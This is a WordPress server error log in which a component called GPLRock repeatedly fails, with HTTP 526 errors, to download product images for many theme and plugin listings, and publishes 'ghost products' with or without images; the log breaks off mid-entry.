[05-Apr-2026 19:47:02 UTC] GPLRock: Image download failed for product vindors-windows-doors-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:04 UTC] GPLRock: Image download failed for product vindors-windows-doors-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vindors---windows--doors-company-wordpress-theme-29038.webp for product vindors-windows-doors-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:06 UTC] GPLRock WARNING: Image download failed for product vindors-windows-doors-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vindors---windows--doors-company-wordpress-theme-29038.webp [05-Apr-2026 19:47:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vindors-windows-doors-company-wordpress-theme [05-Apr-2026 19:47:06 UTC] GPLRock: Image download failed for product royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:08 UTC] GPLRock: Image download failed for product royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royalgold---a-luxury--responsive-hotel-or-resort-theme-for-wordpress-27290.webp for product royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:10 UTC] GPLRock: Image download failed for product royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:12 UTC] GPLRock: Image download failed for product royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royalgold---a-luxury--responsive-hotel-or-resort-theme-for-wordpress-27290.webp for product royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:15 UTC] GPLRock WARNING: Image download failed for product royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress. URL: https://meldwp.com/wp-content/uploads/royalgold---a-luxury--responsive-hotel-or-resort-theme-for-wordpress-27290.webp [05-Apr-2026 19:47:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: royalgold-a-luxury-responsive-hotel-or-resort-theme-for-wordpress [05-Apr-2026 19:47:15 UTC] GPLRock: Image download failed for product obira-saas-business-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:17 UTC] GPLRock: Image download failed for product obira-saas-business-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/obira---saas-business--app-showcase-wordpress-theme-13792.webp for product obira-saas-business-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:19 UTC] GPLRock: Image download failed for product obira-saas-business-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:21 UTC] GPLRock: Image download failed for product obira-saas-business-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/obira---saas-business--app-showcase-wordpress-theme-13792.webp for product obira-saas-business-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:23 UTC] GPLRock WARNING: Image download failed for product obira-saas-business-app-showcase-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/obira---saas-business--app-showcase-wordpress-theme-13792.webp [05-Apr-2026 19:47:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: obira-saas-business-app-showcase-wordpress-theme [05-Apr-2026 19:47:23 UTC] GPLRock: Image download failed for product voisen-woocommerce-responsive-fashion-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:25 UTC] GPLRock: Image download failed for product voisen-woocommerce-responsive-fashion-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voisen---woocommerce-responsive-fashion-theme-15956.webp for product voisen-woocommerce-responsive-fashion-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:28 UTC] GPLRock: Image download failed for product voisen-woocommerce-responsive-fashion-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:30 UTC] GPLRock: Image download failed for product voisen-woocommerce-responsive-fashion-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voisen---woocommerce-responsive-fashion-theme-15956.webp for product voisen-woocommerce-responsive-fashion-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:32 UTC] GPLRock WARNING: Image download failed for product voisen-woocommerce-responsive-fashion-theme. URL: https://meldwp.com/wp-content/uploads/voisen---woocommerce-responsive-fashion-theme-15956.webp [05-Apr-2026 19:47:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: voisen-woocommerce-responsive-fashion-theme [05-Apr-2026 19:47:32 UTC] GPLRock: Image download failed for product revo-studio-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:34 UTC] GPLRock: Image download failed for product revo-studio-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revo-studio---multipurpose-wordpress-theme-20473.webp for product revo-studio-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:36 UTC] GPLRock: Image download failed for product revo-studio-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:38 UTC] GPLRock: Image download failed for product revo-studio-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revo-studio---multipurpose-wordpress-theme-20473.webp for product revo-studio-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:40 UTC] GPLRock WARNING: Image download failed for product revo-studio-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/revo-studio---multipurpose-wordpress-theme-20473.webp [05-Apr-2026 19:47:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revo-studio-multipurpose-wordpress-theme [05-Apr-2026 19:47:41 UTC] GPLRock: Image downloaded successfully for product anne-alison-soft-personal-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f1431ca.webp [05-Apr-2026 19:47:41 UTC] GPLRock: Using pre-downloaded image for product anne-alison-soft-personal-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f1431ca.webp [05-Apr-2026 19:47:41 UTC] GPLRock: Ghost product published with image - Product ID: anne-alison-soft-personal-blog-theme [05-Apr-2026 19:47:41 UTC] GPLRock: Image download failed for product luxrio-ecommerce-jewellery-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:43 UTC] GPLRock: Image download failed for product luxrio-ecommerce-jewellery-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxrio--ecommerce-jewellery--fashion-wordpress-theme-28789.webp for product luxrio-ecommerce-jewellery-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:45 UTC] GPLRock: Image download failed for product luxrio-ecommerce-jewellery-fashion-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:47 UTC] GPLRock: Image download failed for product luxrio-ecommerce-jewellery-fashion-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:47:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxrio--ecommerce-jewellery--fashion-wordpress-theme-28789.webp for product luxrio-ecommerce-jewellery-fashion-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:47:49 UTC] GPLRock WARNING: Image download failed for product luxrio-ecommerce-jewellery-fashion-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luxrio--ecommerce-jewellery--fashion-wordpress-theme-28789.webp [05-Apr-2026 19:47:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxrio-ecommerce-jewellery-fashion-wordpress-theme [05-Apr-2026 19:48:34 UTC] GPLRock: Image download failed for product woocommerce-product-table-2 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:37 UTC] GPLRock: Image download failed for product woocommerce-product-table-2 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-table-29100.webp for product woocommerce-product-table-2 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:48:39 UTC] GPLRock: Image download failed for product woocommerce-product-table-2 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:41 UTC] GPLRock: Image download failed for product woocommerce-product-table-2 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-table-29100.webp for product woocommerce-product-table-2 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:48:43 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-table-2. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-table-29100.webp [05-Apr-2026 19:48:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-table-2 [05-Apr-2026 19:48:43 UTC] GPLRock: Image download failed for product mailster-integration-with-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:45 UTC] GPLRock: Image download failed for product mailster-integration-with-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailster-integration-with-arforms-28474.webp for product mailster-integration-with-arforms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:48:47 UTC] GPLRock: Image download failed for product mailster-integration-with-arforms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:49 UTC] GPLRock: Image download failed for product mailster-integration-with-arforms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailster-integration-with-arforms-28474.webp for product mailster-integration-with-arforms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:48:52 UTC] GPLRock WARNING: Image download failed for product mailster-integration-with-arforms. URL: https://meldwp.com/wp-content/uploads/mailster-integration-with-arforms-28474.webp [05-Apr-2026 19:48:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mailster-integration-with-arforms [05-Apr-2026 19:48:52 UTC] GPLRock: Image download failed for product woocommerce-image-review-for-discount-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:54 UTC] GPLRock: Image download failed for product woocommerce-image-review-for-discount-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-image-review-for-discount---wordpress-plugin-14602.webp for product woocommerce-image-review-for-discount-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:48:56 UTC] GPLRock: Image download failed for product woocommerce-image-review-for-discount-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:48:58 UTC] GPLRock: Image download failed for product woocommerce-image-review-for-discount-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-image-review-for-discount---wordpress-plugin-14602.webp for product woocommerce-image-review-for-discount-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:00 UTC] GPLRock WARNING: Image download failed for product woocommerce-image-review-for-discount-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-image-review-for-discount---wordpress-plugin-14602.webp [05-Apr-2026 19:49:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-image-review-for-discount-wordpress-plugin [05-Apr-2026 19:49:01 UTC] GPLRock: Image download failed for product walogin-membership-management-with-blockchain-authenticator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:03 UTC] GPLRock: Image download failed for product walogin-membership-management-with-blockchain-authenticator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/walogin---membership-management-with-blockchain-authenticator-30289.webp for product walogin-membership-management-with-blockchain-authenticator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:05 UTC] GPLRock: Image download failed for product walogin-membership-management-with-blockchain-authenticator (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:07 UTC] GPLRock: Image download failed for product walogin-membership-management-with-blockchain-authenticator (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/walogin---membership-management-with-blockchain-authenticator-30289.webp for product walogin-membership-management-with-blockchain-authenticator after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:09 UTC] GPLRock WARNING: Image download failed for product walogin-membership-management-with-blockchain-authenticator. URL: https://meldwp.com/wp-content/uploads/walogin---membership-management-with-blockchain-authenticator-30289.webp [05-Apr-2026 19:49:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: walogin-membership-management-with-blockchain-authenticator [05-Apr-2026 19:49:09 UTC] GPLRock: Image download failed for product woocommerce-shortcodes-for-kingcomposer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:11 UTC] GPLRock: Image download failed for product woocommerce-shortcodes-for-kingcomposer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shortcodes-for-kingcomposer-19487.webp for product woocommerce-shortcodes-for-kingcomposer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:13 UTC] GPLRock: Image download failed for product woocommerce-shortcodes-for-kingcomposer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:16 UTC] GPLRock: Image download failed for product woocommerce-shortcodes-for-kingcomposer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-shortcodes-for-kingcomposer-19487.webp for product woocommerce-shortcodes-for-kingcomposer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:18 UTC] GPLRock WARNING: Image download failed for product woocommerce-shortcodes-for-kingcomposer. URL: https://meldwp.com/wp-content/uploads/woocommerce-shortcodes-for-kingcomposer-19487.webp [05-Apr-2026 19:49:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-shortcodes-for-kingcomposer [05-Apr-2026 19:49:18 UTC] GPLRock: Image download failed for product fat-coincap-cryptocurrency-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:20 UTC] GPLRock: Image download failed for product fat-coincap-cryptocurrency-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fat-coincap---cryptocurrency-wordpress-plugin-33077.webp for product fat-coincap-cryptocurrency-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:22 UTC] GPLRock: Image download failed for product fat-coincap-cryptocurrency-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:24 UTC] GPLRock: Image download failed for product fat-coincap-cryptocurrency-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fat-coincap---cryptocurrency-wordpress-plugin-33077.webp for product fat-coincap-cryptocurrency-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:26 UTC] GPLRock WARNING: Image download failed for product fat-coincap-cryptocurrency-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/fat-coincap---cryptocurrency-wordpress-plugin-33077.webp [05-Apr-2026 19:49:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fat-coincap-cryptocurrency-wordpress-plugin [05-Apr-2026 19:49:26 UTC] GPLRock: Image download failed for product chopitup-live-chat-with-firebase (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:29 UTC] GPLRock: Image download failed for product chopitup-live-chat-with-firebase (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chopitup-live-chat-with-firebase-26832.webp for product chopitup-live-chat-with-firebase after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:31 UTC] GPLRock: Image download failed for product chopitup-live-chat-with-firebase (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:33 UTC] GPLRock: Image download failed for product chopitup-live-chat-with-firebase (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/chopitup-live-chat-with-firebase-26832.webp for product chopitup-live-chat-with-firebase after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:35 UTC] GPLRock WARNING: Image download failed for product chopitup-live-chat-with-firebase. URL: https://meldwp.com/wp-content/uploads/chopitup-live-chat-with-firebase-26832.webp [05-Apr-2026 19:49:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: chopitup-live-chat-with-firebase [05-Apr-2026 19:49:35 UTC] GPLRock: Image download failed for product mercadopago-payment-gateway-for-easy-digital-downloads (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:37 UTC] GPLRock: Image download failed for product mercadopago-payment-gateway-for-easy-digital-downloads (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mercadopago-payment-gateway-for-easy-digital-downloads-28962.webp for product mercadopago-payment-gateway-for-easy-digital-downloads after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:40 UTC] GPLRock: Image download failed for product mercadopago-payment-gateway-for-easy-digital-downloads (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:42 UTC] GPLRock: Image download failed for product mercadopago-payment-gateway-for-easy-digital-downloads (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mercadopago-payment-gateway-for-easy-digital-downloads-28962.webp for product mercadopago-payment-gateway-for-easy-digital-downloads after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:44 UTC] GPLRock WARNING: Image download failed for product mercadopago-payment-gateway-for-easy-digital-downloads. URL: https://meldwp.com/wp-content/uploads/mercadopago-payment-gateway-for-easy-digital-downloads-28962.webp [05-Apr-2026 19:49:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mercadopago-payment-gateway-for-easy-digital-downloads [05-Apr-2026 19:49:44 UTC] GPLRock: Image downloaded successfully for product marker-clusterer-add-on-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bfe4c983.webp [05-Apr-2026 19:49:44 UTC] GPLRock: Using pre-downloaded image for product marker-clusterer-add-on-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bfe4c983.webp [05-Apr-2026 19:49:44 UTC] GPLRock: Ghost product published with image - Product ID: marker-clusterer-add-on-for-wordpress [05-Apr-2026 19:49:44 UTC] GPLRock: Image download failed for product flutkit-flutter-figma-ui-kit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:46 UTC] GPLRock: Image download failed for product flutkit-flutter-figma-ui-kit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flutkit---flutter--figma-ui-kit-13736.webp for product flutkit-flutter-figma-ui-kit after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:49 UTC] GPLRock: Image download failed for product flutkit-flutter-figma-ui-kit (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:51 UTC] GPLRock: Image download failed for product flutkit-flutter-figma-ui-kit (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:49:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flutkit---flutter--figma-ui-kit-13736.webp for product flutkit-flutter-figma-ui-kit after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:49:53 UTC] GPLRock WARNING: Image download failed for product flutkit-flutter-figma-ui-kit. URL: https://meldwp.com/wp-content/uploads/flutkit---flutter--figma-ui-kit-13736.webp [05-Apr-2026 19:49:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flutkit-flutter-figma-ui-kit [05-Apr-2026 19:50:36 UTC] GPLRock: Image download failed for product extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:38 UTC] GPLRock: Image download failed for product extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/extendons-woocommerce-dynamic-pricing-plugin--bulk-discounts-30755.webp for product extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:50:40 UTC] GPLRock: Image download failed for product extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:42 UTC] GPLRock: Image download failed for product extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/extendons-woocommerce-dynamic-pricing-plugin--bulk-discounts-30755.webp for product extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:50:44 UTC] GPLRock WARNING: Image download failed for product extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts. URL: https://meldwp.com/wp-content/uploads/extendons-woocommerce-dynamic-pricing-plugin--bulk-discounts-30755.webp [05-Apr-2026 19:50:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: extendons-woocommerce-dynamic-pricing-plugin-bulk-discounts [05-Apr-2026 19:50:44 UTC] GPLRock: Image download failed for product listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:46 UTC] GPLRock: Image download failed for product listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/listar-fluxpro---mobile-directory-listing---claim-listing---booking-and-payment-15529.webp for product listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:50:49 UTC] GPLRock: Image download failed for product listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:51 UTC] GPLRock: Image download failed for product listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/listar-fluxpro---mobile-directory-listing---claim-listing---booking-and-payment-15529.webp for product listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:50:53 UTC] GPLRock WARNING: Image download failed for product listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment. URL: https://meldwp.com/wp-content/uploads/listar-fluxpro---mobile-directory-listing---claim-listing---booking-and-payment-15529.webp [05-Apr-2026 19:50:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: listar-fluxpro-mobile-directory-listing-claim-listing-booking-and-payment [05-Apr-2026 19:50:53 UTC] GPLRock: Image download failed for product wordpress-multisite-taxonomy-sync (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:55 UTC] GPLRock: Image download failed for product wordpress-multisite-taxonomy-sync (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:50:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-multisite-taxonomy-sync-13539.webp for product wordpress-multisite-taxonomy-sync after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:50:57 UTC] GPLRock: Image download failed for product wordpress-multisite-taxonomy-sync (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:00 UTC] GPLRock: Image download failed for product wordpress-multisite-taxonomy-sync (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-multisite-taxonomy-sync-13539.webp for product wordpress-multisite-taxonomy-sync after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:02 UTC] GPLRock WARNING: Image download failed for product wordpress-multisite-taxonomy-sync. URL: https://meldwp.com/wp-content/uploads/wordpress-multisite-taxonomy-sync-13539.webp [05-Apr-2026 19:51:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-multisite-taxonomy-sync [05-Apr-2026 19:51:03 UTC] GPLRock: Image download failed for product albumslist-v32-gallery-module-for-gmedia-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:05 UTC] GPLRock: Image download failed for product albumslist-v32-gallery-module-for-gmedia-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/albumslist-v32--gallery-module-for-gmedia-plugin-25139.webp for product albumslist-v32-gallery-module-for-gmedia-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:07 UTC] GPLRock: Image download failed for product albumslist-v32-gallery-module-for-gmedia-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:09 UTC] GPLRock: Image download failed for product albumslist-v32-gallery-module-for-gmedia-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/albumslist-v32--gallery-module-for-gmedia-plugin-25139.webp for product albumslist-v32-gallery-module-for-gmedia-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:12 UTC] GPLRock WARNING: Image download failed for product albumslist-v32-gallery-module-for-gmedia-plugin. URL: https://meldwp.com/wp-content/uploads/albumslist-v32--gallery-module-for-gmedia-plugin-25139.webp [05-Apr-2026 19:51:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: albumslist-v32-gallery-module-for-gmedia-plugin [05-Apr-2026 19:51:12 UTC] GPLRock: Image download failed for product cl-team-team-showcase-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:14 UTC] GPLRock: Image download failed for product cl-team-team-showcase-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cl-team---team-showcase-wordpress-plugin-296.webp for product cl-team-team-showcase-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:16 UTC] GPLRock: Image download failed for product 